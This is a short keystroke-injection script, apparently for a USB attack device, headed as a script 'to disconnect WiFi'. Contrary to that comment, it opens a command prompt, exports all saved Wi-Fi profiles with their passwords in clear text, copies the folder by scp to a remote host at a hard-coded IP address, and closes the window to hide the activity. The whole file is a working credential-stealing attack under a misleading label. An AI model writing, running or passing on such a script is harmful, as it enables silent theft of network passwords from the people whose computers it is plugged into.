/* Script to disconnect WiFi
Author: M.H.
*/
typingSpeed(0,0);
press("WIN R");
delay(500);
type("cmd");
delay(500);
press("ENTER")  //press("LEFT_CTRL LEFT_SHIFT ENTER");
delay(500);
type("mkdir WLan");
delay(200);
press("ENTER");
delay(200)
type("cd Wlan");
press("ENTER");
delay(200);
type("netsh wlan export profile key=clear");
delay(200);
press("ENTER");
delay(2500);
type("set var=%cd%");
delay(100);
press("ENTER");
delay(200);
type("scp -r %var% jarvis@72.14.177.48:");
delay(100);
press("ENTER");
delay(3000);
press("ALT F4");
